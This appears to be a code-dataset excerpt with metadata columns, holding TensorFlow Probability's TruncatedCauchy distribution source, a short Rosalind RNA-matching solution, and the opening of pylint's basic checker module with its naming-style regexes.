{ 0 otherwise
z = (x - loc) / scale
A = CauchyCDF((high - loc) / scale) - CauchyCDF((low - loc) / scale)
```
where:
* `CauchyCDF` is the cumulative density function of the Cauchy distribution
with 0 mean and unit variance.
This is a scalar distribution so the event shape is always scalar and the
dimensions of the parameters define the batch_shape.
#### Examples
```python
tfd = tfp.distributions
# Define a batch of two scalar TruncatedCauchy distributions with modes
# at 0. and 1.0 .
dist = tfd.TruncatedCauchy(loc=[0., 1.], scale=1.,
low=[-1., 0.],
high=[1., 1.])
# Evaluate the pdf of the distributions at 0.5 and 0.8 respectively returning
# a 2-vector tensor.
dist.prob([0.5, 0.8])
# Get 3 samples, returning a 3 x 2 tensor.
dist.sample([3])
```
"""
def __init__(self,
loc,
scale,
low,
high,
validate_args=False,
allow_nan_stats=True,
name='TruncatedCauchy'):
"""Construct a TruncatedCauchy.
All parameters of the distribution will be broadcast to the same shape,
so the resulting distribution will have a batch_shape of the broadcast
shape of all parameters.
Args:
loc: Floating point tensor; the modes of the corresponding non-truncated
Cauchy distribution(s).
scale: Floating point tensor; the scales of the distribution(s).
Must contain only positive values.
low: `float` `Tensor` representing lower bound of the distribution's
support. Must be such that `low < high`.
high: `float` `Tensor` representing upper bound of the distribution's
support. Must be such that `low < high`.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked at run-time.
allow_nan_stats: Python `bool`, default `True`. When `True`,
statistics (e.g., mean, mode, variance) use the value '`NaN`' to
indicate the result is undefined. When `False`, an exception is raised
if one or more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = dict(locals())
with tf.name_scope(name) as name:
dtype = dtype_util.common_dtype([loc, scale, low, high], tf.float32)
self._loc = tensor_util.convert_nonref_to_tensor(
loc, name='loc', dtype=dtype)
self._scale = tensor_util.convert_nonref_to_tensor(
scale, name='scale', dtype=dtype)
self._low = tensor_util.convert_nonref_to_tensor(
low, name='low', dtype=dtype)
self._high = tensor_util.convert_nonref_to_tensor(
high, name='high', dtype=dtype)
dtype_util.assert_same_float_dtype(
[self._loc, self._scale, self._low, self._high])
super(TruncatedCauchy, self).__init__(
dtype=dtype,
# Samples do not have gradients with respect to `_low` and `_high`.
# TODO(b/161297284): Implement these gradients.
reparameterization_type=reparameterization.NOT_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
name=name)
def _loc_scale_low_high(self, loc=None, scale=None, low=None, high=None):
loc = tf.convert_to_tensor(self.loc if loc is None else loc)
scale = tf.convert_to_tensor(self.scale if scale is None else scale)
low = tf.convert_to_tensor(self.low if low is None else low)
high = tf.convert_to_tensor(self.high if high is None else high)
return loc, scale, low, high
def _standardized_low_and_high(self,
loc=None,
scale=None,
low=None,
high=None):
loc, scale, low, high = self._loc_scale_low_high(
loc=loc, scale=scale, low=low, high=high)
return (low - loc) / scale, (high - loc) / scale
def _normalizer(self,
loc=None,
scale=None,
low=None,
high=None,
std_low=None,
std_high=None):
if std_low is None or std_high is None:
std_low, std_high = self._standardized_low_and_high(
loc=loc, scale=scale, low=low, high=high)
return _cauchy_cdf_diff(std_high, std_low)
def _log_normalizer(self,
loc=None,
scale=None,
low=None,
high=None,
std_low=None,
std_high=None):
return tf.math.log(self._normalizer(
loc=loc,
scale=scale,
low=low,
high=high,
std_low=std_low,
std_high=std_high))
@classmethod
def _parameter_properties(cls, dtype, num_classes=None):
# pylint: disable=g-long-lambda
return dict(
loc=parameter_properties.ParameterProperties(),
scale=parameter_properties.ParameterProperties(
default_constraining_bijector_fn=(
lambda: softplus_bijector.Softplus(low=dtype_util.eps(dtype)))),
low=parameter_properties.ParameterProperties(),
# TODO(b/169874884): Support decoupled parameterization.
high=parameter_properties.ParameterProperties(
default_constraining_bijector_fn=parameter_properties
.BIJECTOR_NOT_IMPLEMENTED,))
# pylint: enable=g-long-lambda
@property
def loc(self):
return self._loc
@property
def scale(self):
return self._scale
@property
def low(self):
return self._low
@property
def high(self):
return self._high
def _batch_shape(self):
return functools.reduce(
tf.broadcast_static_shape,
(self.loc.shape, self.scale.shape, self.low.shape, self.high.shape))
def _batch_shape_tensor(self, loc=None, scale=None, low=None, high=None):
return functools.reduce(
ps.broadcast_shape,
(ps.shape(self.loc if loc is None else loc),
ps.shape(self.scale if scale is None else scale),
ps.shape(self.low if low is None else low),
ps.shape(self.high if high is None else high)))
def _event_shape(self):
return tf.TensorShape([])
def _sample_n(self, n, seed=None):
loc, scale, low, high = self._loc_scale_low_high()
batch_shape = self._batch_shape_tensor(
loc=loc, scale=scale, low=low, high=high)
sample_and_batch_shape = ps.concat([[n], batch_shape], axis=0)
u = samplers.uniform(sample_and_batch_shape, dtype=self.dtype, seed=seed)
return self._quantile(u, loc=loc, scale=scale, low=low, high=high)
def _log_prob(self, x):
loc, scale, low, high = self._loc_scale_low_high()
log_prob = (
-tf.math.log1p(tf.square((x - loc) / scale))
- (np.log(np.pi) + tf.math.log(scale))
- self._log_normalizer(loc=loc, scale=scale, low=low, high=high))
# p(x) is 0 outside the bounds.
return tf.where((x > high) | (x < low),
dtype_util.as_numpy_dtype(x.dtype)(-np.inf),
log_prob)
def _cdf(self, x):
loc, scale, low, high = self._loc_scale_low_high()
std_low, std_high = self._standardized_low_and_high(
low=low, high=high, loc=loc, scale=scale)
return tf.clip_by_value(
((_cauchy_cdf_diff((x - loc) / scale, std_low))
/ self._normalizer(std_low=std_low, std_high=std_high)),
clip_value_min=0., clip_value_max=1.)
def _log_cdf(self, x):
loc, scale, low, high = self._loc_scale_low_high()
std_low, std_high = self._standardized_low_and_high(
low=low, high=high, loc=loc, scale=scale)
return (
tf.math.log(_cauchy_cdf_diff((x - loc) / scale, std_low))
- self._log_normalizer(std_low=std_low, std_high=std_high))
def _mean(self):
loc, scale, low, high = self._loc_scale_low_high()
std_low, std_high = self._standardized_low_and_high(
low=low, high=high, loc=loc, scale=scale)
# Formula from David Olive, "Applied Robust Statistics" --
# see http://parker.ad.siu.edu/Olive/ch4.pdf .
t = (tf.math.log1p(tf.math.square(std_high))
- tf.math.log1p(tf.math.square(std_low)))
t = t / (2 * tfp_math.atan_difference(std_high, std_low))
return loc + scale * t
def _mode(self):
# mode = { loc: for low <= loc <= high
# low: for loc < low
# high: for loc > high
# }
loc = tf.convert_to_tensor(self.loc)
low = tf.convert_to_tensor(self.low)
high = tf.convert_to_tensor(self.high)
shape = self._batch_shape_tensor(loc=loc, low=low, high=high)
# We *must* broadcast with scale to get a correctly shaped output, but
# TODO(b/141460015): we should not have to explicitly broadcast the first
# parameter to clip_by_value to align with the second and third parameters.
return tf.clip_by_value(tf.broadcast_to(loc, shape), low, high)
def _variance(self):
loc, scale, low, high = self._loc_scale_low_high()
std_low, std_high = self._standardized_low_and_high(
low=low, high=high, loc=loc, scale=scale)
# Formula from David Olive, "Applied Robust Statistics" --
# see http://parker.ad.siu.edu/Olive/ch4.pdf .
atan_diff = tfp_math.atan_difference(std_high, std_low)
t = (std_high - std_low - atan_diff) / atan_diff
std_mean = ((tf.math.log1p(tf.math.square(std_high))
- tf.math.log1p(tf.math.square(std_low))) / (2 * atan_diff))
return tf.math.square(scale) * (t - tf.math.square(std_mean))
def _quantile(self, p, loc=None, scale=None, low=None, high=None):
loc, scale, low, high = self._loc_scale_low_high(loc, scale, low, high)
std_low, std_high = self._standardized_low_and_high(
low=low, high=high, loc=loc, scale=scale)
# Use the sum of tangents formula.
# First, the quantile of the cauchy distribution is tan(pi * (x - 0.5)).
# and the cdf of the cauchy distribution is 0.5 + arctan(x) / np.pi
# WLOG, we will assume loc = 0 , scale = 1 (these can be taken in to account
# by rescaling and shifting low and high, and then scaling the output).
# We would like to compute quantile(p * (cdf(high) - cdf(low)) + cdf(low))
# This is the same as:
# tan(pi * (cdf(low) + (cdf(high) - cdf(low)) * p - 0.5))
# Let a = pi * (cdf(low) - 0.5), b = pi * (cdf(high) - cdf(low)) * u
# By using the formula for the cdf we have:
# a = arctan(low), b = arctan_difference(high, low) * u
# Thus the quantile is now tan(a + b).
# By appealing to the sum of tangents formula we have:
# tan(a + b) = (tan(a) + tan(b)) / (1 - tan(a) * tan(b)) =
# (low + tan(b)) / (1 - low * tan(b))
# Thus for a 'standard' truncated cauchy we have the quantile as:
# quantile(p) = (low + tan(b)) / (1 - low * tan(b)) where
# b = arctan_difference(high, low) * p.
tanb = tf.math.tan(tfp_math.atan_difference(std_high, std_low) * p)
x = (std_low + tanb) / (1 - std_low * tanb)
# Clip the answer to prevent it from falling numerically outside
# the support.
return numeric.clip_by_value_preserve_gradient(
x * scale + loc, clip_value_min=low, clip_value_max=high)
def _default_event_space_bijector(self):
return sigmoid_bijector.Sigmoid(
low=self.low, high=self.high, validate_args=self.validate_args)
def _parameter_control_dependencies(self, is_init):
if not self.validate_args:
return []
assertions = []
low = None
high = None
if is_init != tensor_util.is_ref(self.low):
low = tf.convert_to_tensor(self.low)
assertions.append(
assert_util.assert_finite(low, message='`low` is not finite'))
if is_init != tensor_util.is_ref(self.high):
high = tf.convert_to_tensor(self.high)
assertions.append(
assert_util.assert_finite(high, message='`high` is not finite'))
if is_init != tensor_util.is_ref(self.loc):
assertions.append(
assert_util.assert_finite(self.loc, message='`loc` is not finite'))
if is_init != tensor_util.is_ref(self.scale):
scale = tf.convert_to_tensor(self.scale)
assertions.extend([
assert_util.assert_positive(
scale, message='`scale` must be positive'),
assert_util.assert_finite(scale, message='`scale` is not finite'),
])
if (is_init != tensor_util.is_ref(self.low) or
is_init != tensor_util.is_ref(self.high)):
low = tf.convert_to_tensor(self.low) if low is None else low
high = tf.convert_to_tensor(self.high) if high is None else high
assertions.append(
assert_util.assert_greater(
high,
low,
message='TruncatedCauchy not defined when `low >= high`.'))
return assertions
def _sample_control_dependencies(self, x):
assertions = []
if not self.validate_args:
return assertions
assertions.append(assert_util.assert_greater_equal(
x, self.low, message='Sample must be greater than or equal to `low`.'))
assertions.append(assert_util.assert_less_equal(
x, self.high, message='Sample must be less than or equal to `high`.'))
return assertions
| tensorflow_probability/python/distributions/truncated_cauchy.py | 15,816 | The Truncated Cauchy distribution.
The truncated Cauchy is a Cauchy distribution bounded between `low`
and `high` (the pdf is 0 outside these bounds and renormalized).
Samples from this distribution are differentiable with respect to `loc`
and `scale`, but not with respect to the bounds `low` and `high`.
### Mathematical Details
The probability density function (pdf) of this distribution is:
```none
pdf(x; loc, scale, low, high) =
{ 1 / (pi * scale * (1 + z**2) * A) for low <= x <= high
{ 0 otherwise
z = (x - loc) / scale
A = CauchyCDF((high - loc) / scale) - CauchyCDF((low - loc) / scale)
```
where:
* `CauchyCDF` is the cumulative density function of the Cauchy distribution
with 0 mean and unit variance.
This is a scalar distribution so the event shape is always scalar and the
dimensions of the parameters define the batch_shape.
#### Examples
```python
tfd = tfp.distributions
# Define a batch of two scalar TruncatedCauchy distributions with modes
# at 0. and 1.0 .
dist = tfd.TruncatedCauchy(loc=[0., 1.], scale=1.,
low=[-1., 0.],
high=[1., 1.])
# Evaluate the pdf of the distributions at 0.5 and 0.8 respectively returning
# a 2-vector tensor.
dist.prob([0.5, 0.8])
# Get 3 samples, returning a 3 x 2 tensor.
dist.sample([3])
```
Construct a TruncatedCauchy.
All parameters of the distribution will be broadcast to the same shape,
so the resulting distribution will have a batch_shape of the broadcast
shape of all parameters.
Args:
loc: Floating point tensor; the modes of the corresponding non-truncated
Cauchy distribution(s).
scale: Floating point tensor; the scales of the distribution(s).
Must contain only positive values.
low: `float` `Tensor` representing lower bound of the distribution's
support. Must be such that `low < high`.
high: `float` `Tensor` representing upper bound of the distribution's
support. Must be such that `low < high`.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked at run-time.
allow_nan_stats: Python `bool`, default `True`. When `True`,
statistics (e.g., mean, mode, variance) use the value '`NaN`' to
indicate the result is undefined. When `False`, an exception is raised
if one or more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
The Truncated Cauchy distribution class.
Copyright 2020 The TensorFlow Probability Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================ Dependency imports Samples do not have gradients with respect to `_low` and `_high`. TODO(b/161297284): Implement these gradients. pylint: disable=g-long-lambda TODO(b/169874884): Support decoupled parameterization. pylint: enable=g-long-lambda p(x) is 0 outside the bounds. Formula from David Olive, "Applied Robust Statistics" -- see http://parker.ad.siu.edu/Olive/ch4.pdf . mode = { loc: for low <= loc <= high low: for loc < low high: for loc > high } We *must* broadcast with scale to get a correctly shaped output, but TODO(b/141460015): we should not have to explicitly broadcast the first parameter to clip_by_value to align with the second and third parameters. Formula from David Olive, "Applied Robust Statistics" -- see http://parker.ad.siu.edu/Olive/ch4.pdf . Use the sum of tangents formula. First, the quantile of the cauchy distribution is tan(pi * (x - 0.5)). and the cdf of the cauchy distribution is 0.5 + arctan(x) / np.pi WLOG, we will assume loc = 0 , scale = 1 (these can be taken in to account by rescaling and shifting low and high, and then scaling the output). We would like to compute quantile(p * (cdf(high) - cdf(low)) + cdf(low)) This is the same as: tan(pi * (cdf(low) + (cdf(high) - cdf(low)) * p - 0.5)) Let a = pi * (cdf(low) - 0.5), b = pi * (cdf(high) - cdf(low)) * u By using the formula for the cdf we have: a = arctan(low), b = arctan_difference(high, low) * u Thus the quantile is now tan(a + b). By appealing to the sum of tangents formula we have: tan(a + b) = (tan(a) + tan(b)) / (1 - tan(a) * tan(b)) = (low + tan(b)) / (1 - low * tan(b)) Thus for a 'standard' truncated cauchy we have the quantile as: quantile(p) = (low + tan(b)) / (1 - low * tan(b)) where b = arctan_difference(high, low) * p. Clip the answer to prevent it from falling numerically outside the support. | 4,998 | en | 0.791131 |
# http://rosalind.info/problems/mmch/
from math import factorial
def nPr(n, k):
'''Returns the number of k-permutations of n.'''
return factorial(n) / factorial(n-k)
f = open("rosalind_mmch.txt", "r")
dnas = {}
currentKey = ''
for content in f:
# Beginning of a new sample
if '>' in content:
key = content.rstrip().replace('>', '')
currentKey = key
dnas[currentKey] = ''
else:
dnas[currentKey] += content.rstrip()
string = dnas[currentKey]
nbAU = [string.count(c) for c in 'AU']
nbGC = [string.count(c) for c in 'GC']
# There are nPr(max, min) edges for each AU, CG.
# Total number of edges is then the product.
maxNbMatchings = nPr(max(nbAU), min(nbAU)) * nPr(max(nbGC), min(nbGC))
print maxNbMatchings
| rosalind/mmch.py | 762 | http://rosalind.info/problems/mmch/ Beginning of a new sample There are nPr(max, min) edges for each AU, CG. Total number of edges is then the product. | 151 | en | 0.765164 |
# Copyright (c) 2006-2016 LOGILAB S.A. (Paris, FRANCE) <contact@logilab.fr>
# Copyright (c) 2010 Daniel Harding <dharding@gmail.com>
# Copyright (c) 2012-2014 Google, Inc.
# Copyright (c) 2013-2020 Claudiu Popa <pcmanticore@gmail.com>
# Copyright (c) 2014 Brett Cannon <brett@python.org>
# Copyright (c) 2014 Arun Persaud <arun@nubati.net>
# Copyright (c) 2015 Nick Bastin <nick.bastin@gmail.com>
# Copyright (c) 2015 Michael Kefeder <oss@multiwave.ch>
# Copyright (c) 2015 Dmitry Pribysh <dmand@yandex.ru>
# Copyright (c) 2015 Stephane Wirtel <stephane@wirtel.be>
# Copyright (c) 2015 Cosmin Poieana <cmin@ropython.org>
# Copyright (c) 2015 Florian Bruhin <me@the-compiler.org>
# Copyright (c) 2015 Radu Ciorba <radu@devrandom.ro>
# Copyright (c) 2015 Ionel Cristian Maries <contact@ionelmc.ro>
# Copyright (c) 2016, 2019 Ashley Whetter <ashley@awhetter.co.uk>
# Copyright (c) 2016, 2018 Jakub Wilk <jwilk@jwilk.net>
# Copyright (c) 2016-2017 Łukasz Rogalski <rogalski.91@gmail.com>
# Copyright (c) 2016 Glenn Matthews <glenn@e-dad.net>
# Copyright (c) 2016 Elias Dorneles <eliasdorneles@gmail.com>
# Copyright (c) 2016 Yannack <yannack@users.noreply.github.com>
# Copyright (c) 2016 Alex Jurkiewicz <alex@jurkiewi.cz>
# Copyright (c) 2017, 2019-2021 Pierre Sassoulas <pierre.sassoulas@gmail.com>
# Copyright (c) 2017, 2019-2021 hippo91 <guillaume.peillex@gmail.com>
# Copyright (c) 2017 danields <danields761@gmail.com>
# Copyright (c) 2017 Jacques Kvam <jwkvam@gmail.com>
# Copyright (c) 2017 ttenhoeve-aa <ttenhoeve@appannie.com>
# Copyright (c) 2018-2019 Nick Drozd <nicholasdrozd@gmail.com>
# Copyright (c) 2018-2019 Ville Skyttä <ville.skytta@iki.fi>
# Copyright (c) 2018 Sergei Lebedev <185856+superbobry@users.noreply.github.com>
# Copyright (c) 2018 Lucas Cimon <lucas.cimon@gmail.com>
# Copyright (c) 2018 ssolanki <sushobhitsolanki@gmail.com>
# Copyright (c) 2018 Natalie Serebryakova <natalie.serebryakova@Natalies-MacBook-Pro.local>
# Copyright (c) 2018 Sushobhit <31987769+sushobhit27@users.noreply.github.com>
# Copyright (c) 2018 SergeyKosarchuk <sergeykosarchuk@gmail.com>
# Copyright (c) 2018 Steven M. Vascellaro <svascellaro@gmail.com>
# Copyright (c) 2018 Mike Frysinger <vapier@gmail.com>
# Copyright (c) 2018 Chris Lamb <chris@chris-lamb.co.uk>
# Copyright (c) 2018 glmdgrielson <32415403+glmdgrielson@users.noreply.github.com>
# Copyright (c) 2019 Daniel Draper <Germandrummer92@users.noreply.github.com>
# Copyright (c) 2019 Hugo van Kemenade <hugovk@users.noreply.github.com>
# Copyright (c) 2019 Niko Wenselowski <niko@nerdno.de>
# Copyright (c) 2019 Nikita Sobolev <mail@sobolevn.me>
# Copyright (c) 2019 Oisín Moran <OisinMoran@users.noreply.github.com>
# Copyright (c) 2019 Fantix King <fantix@uchicago.edu>
# Copyright (c) 2020 Peter Kolbus <peter.kolbus@gmail.com>
# Copyright (c) 2020 ethan-leba <ethanleba5@gmail.com>
# Copyright (c) 2020 へーさん <hira9603859504@gmail.com>
# Copyright (c) 2020 Damien Baty <damien.baty@polyconseil.fr>
# Copyright (c) 2020 Ram Rachum <ram@rachum.com>
# Copyright (c) 2020 Anthony Sottile <asottile@umich.edu>
# Copyright (c) 2020 bernie gray <bfgray3@users.noreply.github.com>
# Copyright (c) 2020 Gabriel R Sezefredo <g@briel.dev>
# Copyright (c) 2020 Benny <benny.mueller91@gmail.com>
# Copyright (c) 2020 Anubhav <35621759+anubh-v@users.noreply.github.com>
# Copyright (c) 2021 Marc Mueller <30130371+cdce8p@users.noreply.github.com>
# Copyright (c) 2021 Andreas Finkler <andi.finkler@gmail.com>
# Copyright (c) 2021 Or Bahari <orbahari@mail.tau.ac.il>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/LICENSE
"""basic checker for Python code"""
import builtins
import collections
import itertools
import re
import sys
from typing import Pattern
import astroid
from pylint import checkers, exceptions, interfaces
from pylint import utils as lint_utils
from pylint.checkers import utils
from pylint.checkers.utils import (
is_overload_stub,
is_property_deleter,
is_property_setter,
)
from pylint.reporters.ureports import nodes as reporter_nodes
class NamingStyle:
"""It may seem counterintuitive that single naming style has multiple "accepted"
forms of regular expressions, but we need to special-case stuff like dunder names
in method names."""
ANY: Pattern[str] = re.compile(".*")
CLASS_NAME_RGX: Pattern[str] = ANY
MOD_NAME_RGX: Pattern[str] = ANY
CONST_NAME_RGX: Pattern[str] = ANY
COMP_VAR_RGX: Pattern[str] = ANY
DEFAULT_NAME_RGX: Pattern[str] = ANY
CLASS_ATTRIBUTE_RGX: Pattern[str] = ANY
@classmethod
def get_regex(cls, name_type):
return {
"module": cls.MOD_NAME_RGX,
"const": cls.CONST_NAME_RGX,
"class": cls.CLASS_NAME_RGX,
"function": cls.DEFAULT_NAME_RGX,
"method": cls.DEFAULT_NAME_RGX,
"attr": cls.DEFAULT_NAME_RGX,
"argument": cls.DEFAULT_NAME_RGX,
"variable": cls.DEFAULT_NAME_RGX,
"class_attribute": cls.CLASS_ATTRIBUTE_RGX,
"class_const": cls.CONST_NAME_RGX,
"inlinevar": cls.COMP_VAR_RGX,
}[name_type]
class SnakeCaseStyle(NamingStyle):
"""Regex rules for snake_case naming style."""
CLASS_NAME_RGX = re.compile(r"[^\W\dA-Z][^\WA-Z]+$")
MOD_NAME_RGX = re.compile(r"[^\W\dA-Z][^\WA-Z]*$")
CONST_NAME_RGX = re.compile(r"([^\W\dA-Z][^\WA-Z]*|__.*__)$")
COMP_VAR_RGX = re.compile(r"[^\W\dA-Z][^\WA-Z]*$")
DEFAULT_NAME_RGX = re.compile(
r"([^\W\dA-Z][^\WA-Z]{2,}|_[^\WA-Z]*|__[^\WA-Z\d_][^\WA-Z]+__)$"
)
CLASS_ATTRIBUTE_RGX = re.compile(r"([^\W\dA-Z][^\WA-Z]{2,}|__.*__)$")
class CamelCaseStyle(NamingStyle):
"""Regex rules for camelCase naming style."""
CLASS_NAME_RGX = re.compile(r"[^\W\dA-Z][^\W_]+$")
MOD_NAME_RGX = re.compile(r"[^\W\dA-Z][^\W_]*$")
CONST_NAME_RGX = re.compile(r"([^\W\dA-Z][^\W_]*|__.*__)$")
COMP_VAR_RGX = re.compile(r"[^\W\dA-Z][^\W_]*$")
DEFAULT_NAME_RGX = re.compile(r"([^\W\dA-Z][^\W_]{2,}|__[^\W\dA-Z_]\w+__)$")
CLASS_ATTRIBUTE_RGX = re.compile(r"([^\W\dA-Z][^\W_]{2,}|__.*__)$")
class PascalCaseStyle(NamingStyle):
"""Regex rules for PascalCase naming style."""
CLASS_NAME_RGX = re.compile(r"[^\W\da-z][^\W_]+$")
MOD_NAME_RGX = re.compile(r"[^\W\da-z][^\W_]+$")
CONST_NAME_RGX = re.compile(r"([^\W\da-z][^\W_]*|__.*__)$")
COMP_VAR_RGX = re.compile(r"[^\W\da-z][^\W_]+$")
DEFAULT_NAME_RGX = re.compile(r"([^\W\da-z][^\W_]{2,}|__[^\W\dA-Z_]\w+__)$")
CLASS_ATTRIBUTE_RGX = re.compile(r"[^\W\da-z][^\W_]{2,}$")
class UpperCaseStyle(NamingStyle):
"""Regex rules for UPPER_CASE naming style."""
CLASS_NAME_RGX = re.compile(r"[^\W\da-z][^\Wa-z]+$")
MOD_NAME_RGX = re.compile(r"[^\W\da-z][^\Wa-z]+$")
CONST_NAME_RGX = re.compile(r"([^\W\da-z][^\Wa-z]*|__.*__)$")
COMP_VAR_RGX = re.compile(r"[^\W\da-z][^\Wa-z]+$")
DEFAULT_NAME_RGX = re.compile(r"([^\W\da-z][^\Wa-z]{2,}|__[^\W\dA-Z_]\w+__)$")
CLASS_ATTRIBUTE_RGX = re.compile(r"[^\W\da-z][^\Wa-z]{2,}$")
class AnyStyle(NamingStyle):
pass
NAMING_STYLES = {
"snake_case": SnakeCaseStyle,
"camelCase": CamelCaseStyle,
"PascalCase": PascalCaseStyle,
"UPPER_CASE": UpperCaseStyle,
"any": AnyStyle,
}
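# A minimal usage sketch (hypothetical caller code, not part of the checker):
# look up the regex configured for a name category and test a candidate name.
#
#     style = NAMING_STYLES["snake_case"]
#     style.get_regex("function").match("do_something")   # matches
#     style.get_regex("class").match("BadName")           # None: uppercase rejected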
# do not require a doc string on private/system methods
NO_REQUIRED_DOC_RGX = re.compile("^_")
REVERSED_PROTOCOL_METHOD = "__reversed__"
SEQUENCE_PROTOCOL_METHODS = ("__getitem__", "__len__")
REVERSED_METHODS = (SEQUENCE_PROTOCOL_METHODS, (REVERSED_PROTOCOL_METHOD,))
TYPECHECK_COMPARISON_OPERATORS = frozenset(("is", "is not", "==", "!="))
LITERAL_NODE_TYPES = (astroid.Const, astroid.Dict, astroid.List, astroid.Set)
UNITTEST_CASE = "unittest.case"
BUILTINS = builtins.__name__
TYPE_QNAME = "%s.type" % BUILTINS
ABC_METACLASSES = {"_py_abc.ABCMeta", "abc.ABCMeta"}  # Python 3.7+
# Name categories that are always consistent with all naming conventions.
EXEMPT_NAME_CATEGORIES = {"exempt", "ignore"}
# A mapping from qname -> symbol, to be used when generating messages
# about dangerous default values as arguments
DEFAULT_ARGUMENT_SYMBOLS = dict(
zip(
[".".join([BUILTINS, x]) for x in ("set", "dict", "list")],
["set()", "{}", "[]"],
),
**{
x: "%s()" % x
for x in (
"collections.deque",
"collections.ChainMap",
"collections.Counter",
"collections.OrderedDict",
"collections.defaultdict",
"collections.UserDict",
"collections.UserList",
)
},
)
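# For illustration, the resulting mapping contains entries such as
# "builtins.list" -> "[]" and "collections.deque" -> "collections.deque()", so
# the dangerous-default-value message can show the literal or constructor form.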
REVERSED_COMPS = {"<": ">", "<=": ">=", ">": "<", ">=": "<="}
COMPARISON_OPERATORS = frozenset(("==", "!=", "<", ">", "<=", ">="))
# List of methods which can be redefined
REDEFINABLE_METHODS = frozenset(("__module__",))
TYPING_FORWARD_REF_QNAME = "typing.ForwardRef"
def _redefines_import(node):
"""Detect that the given node (AssignName) is inside an
exception handler and redefines an import from the tryexcept body.
Returns True if the node redefines an import, False otherwise.
"""
current = node
while current and not isinstance(current.parent, astroid.ExceptHandler):
current = current.parent
if not current or not utils.error_of_type(current.parent, ImportError):
return False
try_block = current.parent.parent
for import_node in try_block.nodes_of_class((astroid.ImportFrom, astroid.Import)):
for name, alias in import_node.names:
if alias:
if alias == node.name:
return True
elif name == node.name:
return True
return False
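# Hedged illustration of the pattern _redefines_import() detects (module and
# alias names are made up):
#
#     try:
#         import json
#     except ImportError:
#         import simplejson as json   # the AssignName "json" redefines the import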
def in_loop(node):
"""return True if the node is inside a kind of for loop"""
parent = node.parent
while parent is not None:
if isinstance(
parent,
(
astroid.For,
astroid.ListComp,
astroid.SetComp,
astroid.DictComp,
astroid.GeneratorExp,
),
):
return True
parent = parent.parent
return False
def in_nested_list(nested_list, obj):
"""return true if the object is an element of <nested_list> or of a nested
list
"""
for elmt in nested_list:
if isinstance(elmt, (list, tuple)):
if in_nested_list(elmt, obj):
return True
elif elmt == obj:
return True
return False
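# For example, in_nested_list([1, (2, [3, 4])], 3) is True because 3 appears in
# a nested sequence, while in_nested_list([1, (2, [3, 4])], 5) is False.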
def _get_break_loop_node(break_node):
"""
    Returns the loop node that contains the given break node.
Args:
break_node (astroid.Break): the break node of interest.
Returns:
astroid.For or astroid.While: the loop node holding the break node.
"""
loop_nodes = (astroid.For, astroid.While)
parent = break_node.parent
while not isinstance(parent, loop_nodes) or break_node in getattr(
parent, "orelse", []
):
break_node = parent
parent = parent.parent
if parent is None:
break
return parent
def _loop_exits_early(loop):
"""
    Returns True if a loop may end with a break statement.
Args:
loop (astroid.For, astroid.While): the loop node inspected.
Returns:
        bool: True if the loop may end with a break statement, False otherwise.
"""
loop_nodes = (astroid.For, astroid.While)
definition_nodes = (astroid.FunctionDef, astroid.ClassDef)
inner_loop_nodes = [
_node
for _node in loop.nodes_of_class(loop_nodes, skip_klass=definition_nodes)
if _node != loop
]
return any(
_node
for _node in loop.nodes_of_class(astroid.Break, skip_klass=definition_nodes)
if _get_break_loop_node(_node) not in inner_loop_nodes
)
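# Hedged illustration (names are placeholders): the first loop below "exits
# early", the second does not, because its only break belongs to the inner loop.
#
#     for x in seq:          # _loop_exits_early -> True
#         if check(x):
#             break
#
#     for x in seq:          # _loop_exits_early -> False
#         for y in x:
#             break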
def _is_multi_naming_match(match, node_type, confidence):
return (
match is not None
and match.lastgroup is not None
and match.lastgroup not in EXEMPT_NAME_CATEGORIES
and (node_type != "method" or confidence != interfaces.INFERENCE_FAILURE)
)
BUILTIN_PROPERTY = "builtins.property"
def _get_properties(config):
"""Returns a tuple of property classes and names.
Property classes are fully qualified, such as 'abc.abstractproperty' and
    property names are the actual names, such as 'abstractproperty'.
"""
property_classes = {BUILTIN_PROPERTY}
property_names = set() # Not returning 'property', it has its own check.
if config is not None:
property_classes.update(config.property_classes)
property_names.update(
prop.rsplit(".", 1)[-1] for prop in config.property_classes
)
return property_classes, property_names
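# For example, assuming a config whose property_classes option contains
# "abc.abstractproperty", this returns
# ({"builtins.property", "abc.abstractproperty"}, {"abstractproperty"}).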
def _determine_function_name_type(node: astroid.FunctionDef, config=None):
"""Determine the name type whose regex the a function's name should match.
:param node: A function node.
:param config: Configuration from which to pull additional property classes.
:type config: :class:`optparse.Values`
:returns: One of ('function', 'method', 'attr')
:rtype: str
"""
property_classes, property_names = _get_properties(config)
if not node.is_method():
return "function"
if is_property_setter(node) or is_property_deleter(node):
# If the function is decorated using the prop_method.{setter,getter}
# form, treat it like an attribute as well.
return "attr"
if node.decorators:
decorators = node.decorators.nodes
else:
decorators = []
for decorator in decorators:
# If the function is a property (decorated with @property
# or @abc.abstractproperty), the name type is 'attr'.
if isinstance(decorator, astroid.Name) or (
isinstance(decorator, astroid.Attribute)
and decorator.attrname in property_names
):
inferred = utils.safe_infer(decorator)
if (
inferred
and hasattr(inferred, "qname")
and inferred.qname() in property_classes
):
return "attr"
return "method"
def _has_abstract_methods(node):
"""
Determine if the given `node` has abstract methods.
The methods should be made abstract by decorating them
with `abc` decorators.
"""
return len(utils.unimplemented_abstract_methods(node)) > 0
def report_by_type_stats(sect, stats, old_stats):
"""make a report of
* percentage of different types documented
* percentage of different types with a bad name
"""
# percentage of different types documented and/or with a bad name
nice_stats = {}
for node_type in ("module", "class", "method", "function"):
try:
total = stats[node_type]
except KeyError as e:
raise exceptions.EmptyReportError() from e
nice_stats[node_type] = {}
if total != 0:
try:
documented = total - stats["undocumented_" + node_type]
percent = (documented * 100.0) / total
nice_stats[node_type]["percent_documented"] = "%.2f" % percent
except KeyError:
